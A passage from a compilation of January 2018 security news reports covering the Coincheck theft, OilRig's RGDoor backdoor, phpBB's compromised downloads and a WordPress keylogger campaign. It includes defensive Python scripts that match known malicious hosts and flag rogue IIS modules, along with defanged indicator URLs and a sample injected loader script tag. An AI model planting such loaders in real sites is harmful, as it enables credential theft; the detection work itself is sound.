Ciaran Martin told the Guardian it was inevitable a hostile actor would launch an online attack aimed at crippling Britain's critical infrastructure, such as energy supplies, and it was lucky not to have fallen victim to such a strike already.

Williamson, who is tipped as a possible future ruling Conservative party leader, described his scenario planning as "the real threat that I believe the country is facing at the moment."

A spokesman for the Ministry of Defence said it had nothing further to add to his remarks.

The Russian Embassy in London could not be reached for comment Thursday.


Japan's Crypto Exchange to Refund Customers After Theft
28.1.2018 securityweek Incident
Japan-based virtual currency exchange Coincheck said Sunday it will refund about $400 million to customers after hackers stole hundreds of millions of dollars' worth of digital assets.

The company said it will use its own funds to reimburse about 46.3 billion yen to all 260,000 customers who lost their holdings of NEM, the 10th biggest cryptocurrency by market capitalization.

On Friday, the company detected an "unauthorised access" of the exchange, and later suspended trading for all cryptocurrencies apart from bitcoin.

The resulting 58 billion yen ($530 million) loss exceeded the value of bitcoins which disappeared from MtGox in 2014.

The major Tokyo-based bitcoin exchange collapsed after admitting that 850,000 coins -- worth around $480 million at the time -- had disappeared from its vaults.

The high-profile demise of MtGox failed to douse the enthusiasm for virtual currencies in Japan, which in April became the first country in the world to proclaim it as legal tender.

Nearly one third of global bitcoin transactions in December were denominated in yen, according to specialist website jpbitcoin.com.

As many as 10,000 businesses in Japan are thought to accept bitcoin and bitFlyer, the country's main bitcoin exchange, saw its user base pass the one-million mark in November.

Many Japanese, especially younger investors, have been seduced by the idea of strong profits as the economy has seen years of ultra-low interest rates offering little in the way of traditional returns.

Major Japanese newspapers on Sunday labelled the management of virtual currencies at Coincheck as "sloppy" and said the company had "expanded business by putting safety second".

Local media added the Financial Services Agency was expected to take disciplinary measures against Coincheck, which proclaims itself "the leading bitcoin and cryptocurrency exchange in Asia", following the theft.


Iran-linked APT OilRig targets IIS Web Servers with new RGDoor Backdoor
28.1.2018 securityweek APT

The Iran-linked cyber-espionage group tracked as OilRig has started using a backdoor dubbed RGDoor to target Internet Information Services (IIS) Web servers.

The OilRig hacker group is an Iran-linked APT that has been active since at least 2015, when it mainly targeted organizations in the financial and government sectors in the United States and Middle Eastern countries.

The hackers used the RGDoor backdoor to target Middle Eastern government organizations and financial and educational institutions.

According to the researchers, RGDoor is a secondary backdoor that allows the hackers to regain access to a compromised Web server when the primary TwoFace webshell is discovered and removed.

OilRig hackers have been using the TwoFace webshell since at least June 2016, the backdoor

“Unlike TwoFace, the actors did not develop RGDoor in C# to be interacted with at specific URLs hosted by the targeted IIS web server. Instead, the developer created RGDoor using C++, which results in a compiled dynamic link library (DLL).” states the analysis from PaloAlto Networks.

“The DLL has an exported function named “RegisterModule”, which is important as it led us to believe that this DLL was used as a custom native-code HTTP module that the threat actor would load into IIS.”

The attackers exploited the IIS 7 functionality that allows developers to create modules in C++ to extend IIS’ capabilities; in this way they can carry out custom actions on requests.

The “native-code modules can be installed either in the IIS Manager GUI or via the command-line using the ‘appcmd’ application,” Palo Alto explains.


Malware researchers from Palo Alto Networks discovered that the code calls the RegisterModule function with arguments that ignore inbound HTTP GET requests, but act on all HTTP POST requests.

When the IIS server receives an inbound HTTP POST request, the backdoor parses the request, searching for a specific string in the HTTP “Cookie” field.

That field is used to issue the cmd$ [command to execute], upload$ [path to file], or download$ [path to file] commands.

“RGDoor then constructs its own HTTP response by first setting the “Content-Type” field within the HTTP header to “text/plain”.” continues the analysis.

The choice of the Cookie field makes inbound requests related to the RGDoor backdoor hard to analyze, because IIS does not log the values of this field for inbound HTTP requests by default.

“This backdoor has a rather limited set of commands, however, the three commands provide plenty of functionality for a competent backdoor, as they allow an actor to upload and download files to the server, as well as run commands via command prompt. The use of RGDoor suggests that this group has contingency plans to regain access to a compromised network in the event their webshells are discovered and remediated.” concluded Palo Alto Networks.

Technical details, including IoCs are reported in the analysis published by PaloAlto Networks.


Download URLs for two packages of the phpBB forum software were compromised
28.1.2018 securityaffairs Vulnerability

Hackers compromised the download URLs of the popular phpBB forum software; for around three hours they delivered infected versions of legitimate files.
The popular phpBB free and open source forum software has been compromised by an unknown hacker. According to a security advisory released by the phpBB maintainers, the attacker has compromised download URLs for two phpBB packages.


phpBB (@phpbb) tweeted on Jan 27, 2018: “[Security] phpBB 3.2.2 Packages Compromised http://dlvr.it/QCxM6v”

The compromised download URLs were those for the phpBB 3.2.2 full package and the phpBB 3.2.1 -> 3.2.2 automatic updater.

“Earlier today, we identified that the download URLs for two phpBB packages available on phpBB.com were redirecting to a server that did not belong to us. We immediately took down the links and launched an investigation.” reads the announcement published by the development team.

“The point of entry was a third-party site. Neither phpBB.com nor the phpBB software were exploited in this attack.
If you downloaded either the 3.2.2 full package or the 3.2.1 -> 3.2.2 automatic updater package between the hours of 12:02 PM UTC and 15:03 PM UTC on January 26th, you received an archive modified with a malicious payload.”

The compromised download links were online for around three hours, between 12:02 PM UTC and 15:03 PM UTC on January 26; anyone who used them received malware.

Users who downloaded phpBB 3.2.2 packages on January 26 must verify the SHA256 file hash of the file they downloaded with the one reported on the phpBB official downloads page.


The phpBB development team is still investigating the incident; so far it has only revealed that the entry point is likely a third-party site and clarified that neither phpBB.com nor the phpBB software was exploited in this attack.

At the time of writing it is still unclear how hackers compromised the download URLs.

The phpBB maintainers quickly removed the links to the malicious payload.

Administrators who have already used the package to install or update a phpBB forum are advised to file an incident report on the forum tracker to receive assistance with removal of the malicious code.


Attackers behind Cloudflare_solutions Keylogger are back, 2000 WordPress sites already infected
28.1.2018 securityaffairs Virus

More than 2,000 WordPress sites have been infected with a malicious script that can deliver both a keylogger and the cryptocurrency miner CoinHive.
More than 2,000 sites running the WordPress CMS have been infected with a malicious script that can deliver both a keylogger and the in-browser cryptocurrency miner CoinHive.

This new hacking campaign was spotted by experts from the security firm Sucuri, who believe the attackers are the same ones that launched a campaign infecting 5,500 WordPress sites in December.

In both campaigns, the threat actors used a keylogger dubbed cloudflare[.]solutions, which, despite the name, has no connection to the security firm Cloudflare.

After the December campaign was discovered, the cloudflare[.]solutions domain was taken down, but this new discovery confirms that the threat actors are still active and are using a set of recently registered domains to host the malicious scripts injected into WordPress sites.

By querying the search engine PublicWWW, researchers found that the infected sites include 129 loading scripts from cdns[.]ws and 103 from cdjs[.]online.

“A few days after our keylogger post was released on Dec 8th, 2017, the Cloudflare[.]solutions domain was taken down. This was not the end of the malware campaign, however; attackers immediately registered a number of new domains including cdjs[.]online on Dec 8th, cdns[.]ws on Dec 9th, and msdns[.]online on Dec 16th.” reads the analysis published by Sucuri.

“PublicWWW has already identified relatively few infected sites: 129 websites for cdns[.]ws and 103 websites for cdjs[.]online, but it’s likely that the majority of the websites have not been indexed yet. Since mid-December, msdns[.]online has infected over a thousand websites, though the majority are reinfections from sites that have already been compromised.”

Most of the infected domains are tied to msdns[.]online, with over a thousand reported infections. In many cases, threat actors re-infected WordPress sites compromised in the previous campaign.


The attackers target outdated and poorly configured WordPress sites, injecting the cdjs[.]online script either into the WordPress database (wp_posts table) or into the theme’s functions.php file.

The keylogger script captures data entered into every form on the website, including the admin login form; the information is sent back to the attackers via the WebSocket protocol.

As in previous versions of the campaign, which leveraged a fake Google Analytics script, researchers identified a fake googleanalytics.js that loads an obfuscated “startGoogleAnalytics” script, used to pull the malicious scripts from the attackers’ domains.

Experts discovered many similarities also in the cryptominer component of this campaign.

“We’ve identified that the library jquery-3.2.1.min.js is similar to the encrypted CoinHive cryptomining library from the previous version, loaded from hxxp:// 3117488091/lib/jquery-3.2.1.min.js?v=3.2.11 (or hxxp://185 .209 .23 .219/lib/jquery-3.2.1.min.js?v=3.2.11, a more familiar representation of the IP address). This is not surprising since cdjs[.]online also exists on the server 185 .209 .23 .219.” continues the analysis.

“It’s interesting to note that this script extends the CoinHive library and adds an alternative configuration using the 185 .209 .23 .219 server (and now specifically cdjs[.]online) for LIB_URL and WEBSOCKET_SHARDS.”

According to Sucuri experts, the threat actors behind this hacking campaign have been active since at least April 2017. Over the months, Sucuri has tracked at least three other malicious scripts hosted on the same cloudflare.solutions domain.

The first attack leveraging these scripts was observed in April, when hackers used a malicious JavaScript file to embed banner ads on hacked sites.

In November, experts from Sucuri reported the same attackers were loading malicious scripts disguised as fake jQuery and Google Analytics JavaScript files that were actually a copy of the Coinhive in-browser cryptocurrency miner. By November 22, the experts observed 1,833 sites compromised by the attackers.

Experts noted that this campaign is not yet as large as the one spotted in December, but it should not be underestimated.

“While these new attacks do not yet appear to be as massive as the original cloudflare[.]solutions campaign, the reinfection rate shows that there are still many sites that have failed to properly protect themselves after the original infection,” concluded Sucuri.
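The indicators Sucuri lists above (the cloudflare[.]solutions successor domains and the 185.209.23.219 server, which the injected loader also references as the decimal number 3117488091) can be turned into a simple triage check for wp_posts rows and theme files. The following Python script is an added example, not Sucuri's code; the sample post rows and functions.php fragment are constructed, and only the indicator set is taken from the article.

```python
import ipaddress
import re
from urllib.parse import urlparse

# Indicators quoted in the article above (Sucuri's findings): the original
# keylogger domain, its successor domains and the server they were hosted on.
KNOWN_BAD_HOSTS = {
    "cloudflare.solutions",
    "cdjs.online",
    "cdns.ws",
    "msdns.online",
    "185.209.23.219",
}

# The injected loaders (the fake googleanalytics.js, the patched
# jquery-3.2.1.min.js) arrive as <script src=...> tags inside wp_posts rows
# or inside a theme's functions.php, so that attribute is what we extract.
SCRIPT_SRC_RE = re.compile(
    r"<script\b[^>]*\ssrc\s*=\s*['\"]([^'\"]+)['\"]", re.IGNORECASE
)


def normalise_host(url: str) -> str:
    """Canonical host of a script URL.

    Accepts defanged notation (hxxp://, [.]) so published indicators can be
    pasted in as-is, and converts a host written as one decimal number
    (3117488091) to dotted form (185.209.23.219): browsers accept that
    notation and the campaign used it to hide the server address.
    """
    url = re.sub(r"^hxxp", "http", url.strip(), flags=re.IGNORECASE)
    url = url.replace("[.]", ".")
    host = (urlparse(url).hostname or "").lower()
    if host.isdigit():
        try:
            host = str(ipaddress.IPv4Address(int(host)))
        except ipaddress.AddressValueError:
            pass  # not a valid 32-bit value; leave it as written
    return host


def find_injected_scripts(content, bad_hosts=KNOWN_BAD_HOSTS):
    """Return (src, host) pairs for every script tag loading from a bad host."""
    hits = []
    for src in SCRIPT_SRC_RE.findall(content):
        host = normalise_host(src)
        if host in bad_hosts:
            hits.append((src, host))
    return hits


def scan_wp_posts(rows, bad_hosts=KNOWN_BAD_HOSTS):
    """Given (ID, post_content) rows exported from wp_posts, return the IDs
    whose content carries an injected loader, sorted for stable reporting."""
    return sorted(
        post_id for post_id, body in rows if find_injected_scripts(body, bad_hosts)
    )


# Constructed sample data (not taken from the article): a clean post, a post
# carrying the loader behind the decimal-encoded IP, and a functions.php
# fragment that echoes the fake Google Analytics loader into every page.
SAMPLE_POSTS = [
    (1, "<p>Hello world</p><script src='https://example.com/app.js'></script>"),
    (7, "<p>Sale</p><script src='hxxp://3117488091/lib/jquery-3.2.1.min.js?v=3.2.11'></script>"),
]
SAMPLE_FUNCTIONS_PHP = """<?php
add_action('wp_footer', function () {
    echo '<script type="text/javascript" src="//cdjs[.]online/googleanalytics.js"></script>';
});
"""

if __name__ == "__main__":
    for post_id in scan_wp_posts(SAMPLE_POSTS):
        print(f"wp_posts ID {post_id}: injected loader found")
    for src, host in find_injected_scripts(SAMPLE_FUNCTIONS_PHP):
        print(f"functions.php loads {src} (host {host})")
```

Because the article notes that many of the current infections are reinfections, the same check is worth re-running after cleanup rather than once.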


Intel Working on CPUs With Meltdown, Spectre Protections
27.1.2018 securityweek Safety

Intel is working on CPUs that will include built-in protections against the notorious Meltdown and Spectre attacks, CEO Brian Krzanich revealed on Thursday during a conference call discussing the company’s latest earnings report.

Intel has released some microcode updates to address the vulnerabilities, but the patches have caused serious problems for many users, which has led to Intel and other vendors halting updates.

“Our near term focus is on delivering high quality mitigations to protect our customers’ infrastructure from these exploits. We're working to incorporate silicon-based changes to future products that will directly address the Spectre and Meltdown threats in hardware. And those products will begin appearing later this year,” Krzanich said.

“However, these circumstances are highly dynamic and we updated our risk factors to reflect both the evolving nature of these specific threats and litigation, as well as the security challenge, more broadly,” he added.

The latest financial report shows that the company had a great 2017, with a record fourth-quarter revenue of $17.1 billion and a record full-year revenue of $62.8 billion. Despite its reputation taking a hit due to the Meltdown and Spectre vulnerabilities, the company expects 2018 to also be a record year.

It’s worth noting, however, that one of the factors that could cause results to differ from the company’s expectations are vulnerabilities in Intel processors and other products. In addition to the security flaws themselves, Intel is concerned about the adverse performance and system instability introduced by mitigations, associated lawsuits, the negative publicity they generate, and the impact they may have on customer relationships and reputation, the company said.

Several class action lawsuits have already been filed against Intel, accusing the company of violating state consumer laws by misleading customers about its product and breaching warranties.

Krzanich sold all the stock he was legally allowed to, worth roughly $24 million, just weeks before the existence of Spectre and Meltdown came to light, which has raised insider trading concerns.

Intel has denied the allegations, but French publication LeMagIT reported this week that Intel started informing its partners of the flaws on the same day the company’s CEO sold his shares, specifically November 29.


Iranian Hackers Target IIS Web Servers With New Backdoor
27.1.2018 securityweek CyberSpy

The Iran-linked cyber-espionage group known as OilRig is using a backdoor to target Internet Information Services (IIS) Web servers used by Middle Eastern government organizations and financial and educational institutions.

Dubbed RGDoor, the malware is believed to be a secondary backdoor that allows the actor to regain access to a compromised Web server in the event the primary malware is detected and removed. This primary malicious tool is the TwoFace webshell, which OilRig is believed to have been using since at least June 2016.

Around since 2015, the OilRig threat group has targeted mainly organizations in the financial and government sectors, in the United States and Middle Eastern countries. Believed to be operating out of Iran, the group is using multiple tools, is expanding its arsenal, and is quick to adopt new exploits.

The backdoor was created using C++, which results in a compiled dynamic link library (DLL) with an exported function named “RegisterModule.” Because of that, Palo Alto's researchers believe the DLL was used as a custom native-code HTTP module loaded into IIS, and suggest that there is no visual representation of the shell for the actors to interact with.

This approach takes advantage of IIS 7 functionality that allows developers to create modules in C++ to extend IIS’ capabilities, such as carrying out custom actions on requests. These “native-code modules can be installed either in the IIS Manager GUI or via the command-line using the ‘appcmd’ application,” Palo Alto explains.

The researchers also found that RGDoor would call the “RegisterModule” function with arguments that ignore inbound HTTP GET requests, but act on all HTTP POST requests, even those issued over HTTPS. The malware parses these requests to look for a specific string in the HTTP “Cookie” field, so as to find whether cmd$ [command to execute], upload$ [path to file], or download$ [path to file] commands were issued to it.

“The sample then transmits the data back to the actor by creating a loop that calls the IHttpResponse::WriteEntityChunk method until all of the data is sent to the actor within HTTP responses. If the WriteEntityChunk method fails at any point during this loop, the code will respond to the actor with a HTTP 500 “Server Error” response by using the IHttpResponse::SetStatus method,” the researchers explain.

Because IIS does not log the values within Cookie fields of inbound HTTP requests by default, it’s difficult to locate and analyze inbound requests related to RGDoor. Furthermore, because the module checks all inbound POST requests for commands, the actor can use any URL to interact with it.

The actors behind the backdoor used the TwoFace webshell to load it onto an IIS Web server and gain backdoor access to the compromised system. The main purpose of the tool, however, appears to be regaining access to the server in the event the TwoFace webshell was removed.

“This backdoor has a rather limited set of commands, however, the three commands provide plenty of functionality for a competent backdoor, as they allow an actor to upload and download files to the server, as well as run commands via command prompt. The use of RGDoor suggests that this group has contingency plans to regain access to a compromised network in the event their webshells are discovered and remediated,” Palo Alto concludes.
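Both RGDoor write-ups above make the same defensive point: a native-code module registered with IIS answers on any URL and leaves nothing in the default logs, so the place to look is the module registration itself (applicationHost.config, or the appcmd tool the articles mention, on a live host). The script below is an added example, not Palo Alto Networks' code; it parses a constructed applicationHost.config fragment, expands %windir% to C:\Windows by assumption, and flags any native module whose DLL does not live in the IIS install directory.

```python
import ntpath
import re
import xml.etree.ElementTree as ET

# Microsoft's own native modules ship in the IIS install directory. %windir%
# is expanded to C:\Windows for offline analysis (an assumption; adjust for
# hosts with a non-default system root).
TRUSTED_MODULE_DIR = r"C:\Windows\System32\inetsrv"


def _canonical(path: str) -> str:
    """Expand %windir% and normalise a Windows path for comparison.
    ntpath is used so the check runs the same way on a Linux analysis box."""
    expanded = re.sub(r"%windir%", lambda _m: r"C:\Windows", path, flags=re.IGNORECASE)
    return ntpath.normcase(ntpath.normpath(expanded))


def list_native_modules(config_xml: str):
    """Return (name, image) for each <add> under system.webServer/globalModules.
    This is the registration that appcmd or IIS Manager writes when a native
    module (a DLL exporting RegisterModule, as RGDoor does) is installed."""
    root = ET.fromstring(config_xml)
    found = []
    for section in root.iter("globalModules"):
        for entry in section.findall("add"):
            found.append((entry.get("name"), entry.get("image")))
    return found


def audit_native_modules(config_xml: str, trusted_dir: str = TRUSTED_MODULE_DIR):
    """Flag native modules whose DLL is outside the IIS install directory.

    A module's name is attacker-chosen and proves nothing; the image path is
    the useful signal, because a DLL dropped through a webshell ends up in a
    web root, temp or other user-writable directory rather than in inetsrv.
    """
    trusted_prefix = _canonical(trusted_dir) + "\\"
    findings = []
    for name, image in list_native_modules(config_xml):
        if not image or not _canonical(image).startswith(trusted_prefix):
            findings.append((name, image))
    return findings


# Constructed sample applicationHost.config fragment (not from the analysis):
# two stock Microsoft modules plus one planted DLL under the web root, given
# an innocuous-looking (made-up) name to show why names alone prove nothing.
SAMPLE_CONFIG = """<configuration>
  <system.webServer>
    <globalModules>
      <add name="DefaultDocumentModule" image="%windir%\\System32\\inetsrv\\defdoc.dll" />
      <add name="StaticFileModule" image="%windir%\\System32\\inetsrv\\static.dll" />
      <add name="CompressionHelperModule" image="C:\\inetpub\\wwwroot\\bin\\placeholder_module.dll" />
    </globalModules>
  </system.webServer>
</configuration>
"""

if __name__ == "__main__":
    for name, image in audit_native_modules(SAMPLE_CONFIG):
        print(f"suspicious native module: {name} -> {image}")
```

On a live server the same registrations live in %windir%\System32\inetsrv\config\applicationHost.config; since IIS does not record Cookie values by default, enabling a custom W3C log field for the Cookie request header (supported from IIS 8.5) is what makes later hunting for the cmd$/upload$/download$ strings possible.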


Six Months in Jail for University Email Hacker
27.1.2018 securityweek Crime

A man who accessed over 1,000 email accounts maintained by a New York City-area university to download inappropriate photos and videos was sentenced to 6 months in prison this week.

The man, Jonathan Powell, 30, of Phoenix, Arizona, pled guilty to the charges on August 9, 2017, in Manhattan federal court before United States District Judge Alison J. Nathan, who also imposed the sentence.

According to the allegation he pled guilty to, Powell gained unauthorized access to the email accounts by accessing the password reset utility maintained by the email servers of a United States University that has its primary campus in New York, New York. The tool was meant for authorized users to reset their forgotten passwords.

Powell abused the utility between October 2015 and September 2016 to change the email account passwords of students and others affiliated with the University and to gain access to more than 1,000 accounts.

Once inside the email accounts, he obtained unauthorized access to other password-protected email, social media, and online accounts to which the users of the compromised accounts were registered. These include Apple iCloud, Facebook, Google, LinkedIn, and Yahoo! accounts.

Powell requested password resets for the linked accounts and changed those passwords as well, after a password reset email was sent to the compromised email accounts. Then, he logged into the linked accounts and started looking for private and confidential content.

The investigation into Powell’s nefarious activities revealed that he accessed all of the compromised accounts to download sexually explicit photographs and videos of college-aged women.

Between October 2015 and September 2016, Powell accessed the password reset utility approximately 18,640 different times and attempted around 18,600 password changes for an estimated number of 2,054 unique University email accounts. He succeeded in changing approximately 1,378 passwords for 1,035 email accounts, as he compromised some of the accounts multiple times.

Powell was also found to have compromised 15 email accounts hosted by a University in Pennsylvania. He also admitted to compromising email accounts at several other educational institutions in Arizona, Florida, Ohio, and Texas.

Powell was also sentenced to two years of supervised release and ordered to pay $278,855 in restitution.

“Jonathan Powell used his computer skills to breach the security of a university to gain access to the students’ personal accounts. Once Powell had access, he searched the accounts for compromising photos and videos. No college student should have to fear that personal, private information could be mined by strangers for potentially compromising material,” Geoffrey S. Berman, the United States Attorney for the Southern District of New York, commented.


Data Privacy Concerns Cause Sales Delays: Cisco
27.1.2018 securityweek Privacy

Nearly two-thirds of businesses worldwide have experienced significant delays in sales due to customer data privacy concerns, according to Cisco’s 2018 Privacy Maturity Benchmark Study.

The study, based on the responses of roughly 3,000 cybersecurity professionals from 25 countries, shows that 65% of businesses reported sales cycle delays due to concerns over data privacy, with an average delay of nearly 8 weeks.

However, organizations with a mature privacy process are less affected compared to privacy-immature companies. Privacy-mature firms experienced delays of only 3.4 weeks, while immature businesses reported delays averaging nearly 17 weeks.

Sales delays have also varied depending on several other factors, including country, with the longest delays reported in Mexico and Latin America, and industry, with the longest delays in the government and healthcare sectors.


The report also shows that privacy-mature organizations suffer lower losses as a result of data breaches. According to Cisco, only 39% of privacy-mature organizations experienced losses exceeding $500,000, compared to 74% of companies that have an immature privacy process.

The type of model adopted by organizations for privacy resources also appears to be an important factor. According to the study, businesses with fully centralized and decentralized resources had sales delays of 10 and 7 weeks, respectively. On the other hand, organizations with a hybrid model, which represents a mix between centralized and decentralized, reported delays of less than 5 weeks.

“This study provides valuable empirical evidence of the linkage between firm privacy policies and performance-relevant impacts. These results are indicative of the direction that future empirical research on privacy, and cybersecurity more generally, should take to better validate and focus our understanding of best practices in these important areas,” said Dr. William Lehr, economist at MIT.

The complete 2018 Privacy Maturity Benchmark Study is available for download in PDF format.


Cryptocurrencies Fall After Hack Hits Japan's Coincheck
27.1.2018 securityweek Hacking

Cryptocurrencies fell Friday after Japan-based digital exchange Coincheck suspended client deposits and withdrawals for virtual currencies except bitcoin, saying it had been hacked.

Coincheck said it was investigating "unauthorised access" of the exchange that appeared to result in a loss worth half a billion US dollars of NEM, the 10th biggest cryptocurrency by market capitalisation.

"At 3 am (1800 GMT) today, 523 million NEMs were sent from the NEM address of Coincheck. It's worth 58 billion yen based on the calculation at the rate when detected," said Coincheck's chief operating officer Yusuke Otsuka late Friday.

"We're still examining how many of our customers are affected," he said, adding that the exchange was trying to find out whether the breach was from Japan or another country.

After the exchange suspended deposits and withdrawals, NEM plunged more than 16 percent in a 24-hour period, according to CoinMarketCap.com.

Major virtual currencies had rebounded slightly by late Friday but were still down, with Bitcoin dropping 2.13 percent to $10,987.70, ripple sliding more than six percent and ethereum flat.

Coincheck said it had discovered the breach at 11.25 am and announced it had suspended trading for all cryptocurrencies apart from bitcoin in a series of tweets.

According to its website, which proclaims it is "the leading bitcoin and cryptocurrency exchange in Asia", Tokyo-based Coincheck was founded in 2012 and had 71 employees as of July last year.

In 2014 major Tokyo-based bitcoin exchange MtGox collapsed after admitting that 850,000 coins -- worth around $480 million at the time -- had disappeared from its vaults.

Bitcoin is recognized as legal tender in Japan and nearly one third of global bitcoin transactions in December were denominated in yen, according to specialist website jpbitcoin.com.

The virtual currency is well down from record highs approaching $20,000 in late December, having rocketed 25-fold last year, before being hit by concerns about a bubble and worries about crackdowns on trading it.

Billionaire investor George Soros, known for his legendarily successful currency trading, has dismissed bitcoin as a "typical bubble".

But speaking Thursday at the Davos summit, he said the cryptocurrency would likely avoid a full crash because authoritarians would still use it to make secret investments abroad.


PCI Council Introduces New Standard for Mobile Card Payments
27.1.2018 securityweek Mobil

Responding to the market's growing interest in, and use of, mobile payments, the PCI Security Standards Council (PCI SSC) has announced a new standard for software-based PIN entry on commercial off-the-shelf (COTS) devices, such as smartphones and tablets.

"Mobile point-of-sale (MPOS) solutions have become very popular with smaller merchants for their flexibility and efficiency," explained Aite Group senior analyst Ron van Wezel. "MPOS has enabled them to take orders and accept payments on a tablet or smartphone, anytime and anywhere."

The problem is that the cost of hardware-based chip-and-PIN equipment can be prohibitive for small merchants in mobile situations.

"With the new PIN entry standard," van Wezel continued, "the PCI Council has responded to market need by specifying the security requirements for allowing PIN entry directly on the mobile touchscreen. This means that merchants can accept payments with just their mobile device and a small, cost efficient card reader connected to it along with a secure PIN entry application."

The new standard has been in the pipeline since last summer. In a July 2017 blog post, PCI SSC CTO Troy Leach announced, "We are starting work on a new standard that specifically focuses on software-based PIN-entry on commercial off-the-shelf (COTS) devices, such as consumer-grade mobile phones or tablets."

This is the standard (PDF) now announced. A separate document, Software-Based PIN Entry on COTS Test Requirements, will be published in the next month.

"With advancements in monitoring capabilities and the ability to isolate account data, we are introducing a security approach that leverages software-based security for accepting a PIN within the boundaries of a COTS device," said Leach in a new blog post on Wednesday -- adding that it was an alternative to, and not a replacement for, the existing PCI PIN Transaction Security Point of Interaction (PTS POI) standard.

There are five core principles to the new standard: isolation of PIN from other account data; ensuring the security of the PIN entry application on the COTS device; active security monitoring of the device; a secure card reader device to encrypt account data; and the restriction of transactions to EMV contact and contactless cards.

Initial reaction from the security industry has been mixed; that is, it is a good basic idea, but with reservations.

"While the new PCI PIN requirements are a good idea," Joseph Carson, chief security scientist at Thycotic told SecurityWeek, "this introduces increased risks as end to end security for PIN cannot be guaranteed. For example, credit card theft in Europe has been less impacted than credit card theft in the USA due to the PIN requirement -- meaning that credit card fraud in Europe has been limited due to the PIN. The new requirements mean the risk of the PIN getting exposed is increased and the risk on cyberattacks against the merchants will also increase. The PIN has been protected up until now; however, this new standard is actually lowering that protection."

Chris Morales, head of security analytics at Vectra Networks, has a different concern. "I have questions around how the PCI council intends for vendors to implement the required continuous monitoring for security threats," he said. "Continuous monitoring could be a costly and time-consuming exercise only large vendors or the payment system supplier would be able to afford to implement correctly. I believe these will need to be vetted out with further review by the security community."

Chris Roberts, chief security architect at Acalvio is also concerned about the monitoring aspect. "Monitoring and actually 'doing' anything about it are two different things. We've run afoul of that so many times in the past where companies are monitoring but are asleep at the wheel. It might be time for PCI to look at technologies that go beyond simply reacting.

"It's good they have realized that payments are going mobile," he added, "but it does feel as if they are in reactive mode as opposed to proactively looking at the marketplace and working with the vendors ahead of time to help shape the future as opposed to being part of the problem in 'gatekeeping'."

PCI SSC believes it has got the security right by isolating the PIN within the COTS device from the account identifying information. "This isolation happens as the Primary Account Number (PAN) is never entered on the COTS device with the PIN," said Leach. "Instead that information is captured by an EMV Chip reader that is approved as an SCRP that encrypts the contact or contactless transaction."

And it should be said that he has support. Sanjay Kalra, co-founder and chief product officer at Lacework, comments, "Businesses required to comply to PCI cover many industries -- retail, hospitality, entertainment, healthcare, electronics and more -- and are all rapidly being disrupted by mobile and cloud computing. They need to upgrade their payment processes to reflect the technology disruptions. This update to the PCI standard is welcome and will help organizations safely take advantage of new mobile technologies. Nobody should be surprised if similar changes come to regulations for the cloud."


Cybercriminals are offering for sale infant fullz on the dark web
27.1.2018 securityaffairs CyberCrime

Cybercriminals are offering infant "fullz" for sale on the dark web; it is the first time that unscrupulous sellers have offered this kind of merchandise on a black marketplace.
Crooks are selling Social Security numbers of babies on the dark web, as CNN reported.

The news is disconcerting: this is the first time that unscrupulous sellers have offered this kind of merchandise on a black marketplace.

The offer appeared on Dream Market, one of the biggest Tor marketplaces, which has been around since roughly Nov/Dec 2013.

The seller is offering Social Security numbers of babies along with their dates of birth and mothers' maiden names; the "Infant fullz" goes for $300 worth of bitcoin.

The slang term "fullz" refers to full packages of an individual's identifying information. A "fullz" package contains the person's name, Social Security number, birth date, account numbers and other data.

“Infant fullz get em befor tax seson [sic],” reads the ad.

"Infant fullz" are a precious commodity in the criminal underground: they give crooks access to a clean credit history, and they also allow them to apply for government benefits or take out mortgages.

Cybercriminals consider children's PII a safe asset because this specific type of identity theft can remain undiscovered for years.

"The listing for infant data was discovered by researchers at Terbium Labs, a dark web intelligence firm. The cost and age of the alleged victims came as a surprise to Emily Wilson, the company's director of analysis," CNN states.

“Although the firm has seen child data for sale before, this was the first time it has seen infants’ data for sale.”

“It’s unusual to have information specifically marked as belonging to children or to infants on these markets,” Wilson said.


Identity theft involving children is not a novelty: according to a 2011 report published by Carnegie Mellon University's CyLab, the rate of this specific type of crime against children is 51 times greater than that against adults.

The researchers highlighted that "parents typically don't monitor their children's identities".


Cryptocurrencies Black Friday – Japan-based digital exchange Coincheck hacked
27.1.2018 securityaffairs Hacking

It is a black Friday for cryptocurrencies: after the news of the hack of the Japan-based digital exchange Coincheck, the value of major cryptocurrencies dropped.
It is a black Friday for cryptocurrencies; the news of the hack of the Japan-based digital exchange Coincheck had a significant impact on their value.

Coincheck was founded in 2012 and is one of the most important cryptocurrency exchanges in Asia.

Coincheck suspended deposits and withdrawals for all virtual currencies except bitcoin, and announced it was investigating an "unauthorised access" to the exchange.

According to the company, the hackers stole NEM worth half a billion US dollars; NEM is the 10th biggest cryptocurrency by market capitalization.

The news of the incident had a significant impact on the NEM value, which dropped more than 16 percent in 24 hours.

“At 3 am (1800 GMT) today, 523 million NEMs were sent from the NEM address of Coincheck. It’s worth 58 billion yen based on the calculation at the rate when detected,” said Coincheck COO Yusuke Otsuka.

"We're still examining how many of our customers are affected," he added.

[Figure: NEM Charts – CoinMarketCap.com]

The experts at the exchange are investigating the security breach to find out whether it was from Japan or another country.

Coincheck discovered the incident at 11.25 am and announced the suspension of trading for all cryptocurrencies apart from bitcoin via Twitter.

Coincheck (@coincheck_en), 5:04 AM - Jan 26, 2018:

"We are currently halting deposits, withdrawals, buying and selling of NEM. Please accept our sincere apologies for this inconvenience and rest assured that we are working to resolve this issue as quickly as possible." https://coincheck.com/en/blog/4673 (linked post: "Urgent update regarding deposits of NEM", Coincheck Blog)

In February 2014, Mt. Gox suspended trading and filed for bankruptcy protection from creditors.

At the time, the company was handling over 70% of all bitcoin transactions worldwide; it announced that approximately 850,000 bitcoins ($450 million at the time) belonging to customers and the company had been stolen.


Hurry up, update your Lenovo Fingerprint Manager Pro if you use Windows 7, 8 and 8.1
27.1.2018 securityaffairs Vulnerability

Lenovo has fixed a hardcoded password vulnerability in Lenovo Fingerprint Manager Pro affecting a dozen laptop models running Windows 7, 8 and the 8.1 OS.
The PC vendor Lenovo has fixed a hardcoded password vulnerability, tracked as CVE-2017-3762, affecting a dozen Lenovo laptop models that run Microsoft Windows 7, 8 and 8.1.

Lenovo laptops running Windows 10 are not impacted by the vulnerability because that OS version natively supports fingerprint reader technology.

The list of impacted family models includes ThinkPad, ThinkCentre, and ThinkStation laptops.

“A vulnerability has been identified in Lenovo Fingerprint Manager Pro. Sensitive data stored by Lenovo Fingerprint Manager Pro, including users’ Windows logon credentials and fingerprint data, is encrypted using a weak algorithm, contains a hard-coded password, and is accessible to all users with local non-administrative access to the system it is installed in.” states the security advisory published by Lenovo.


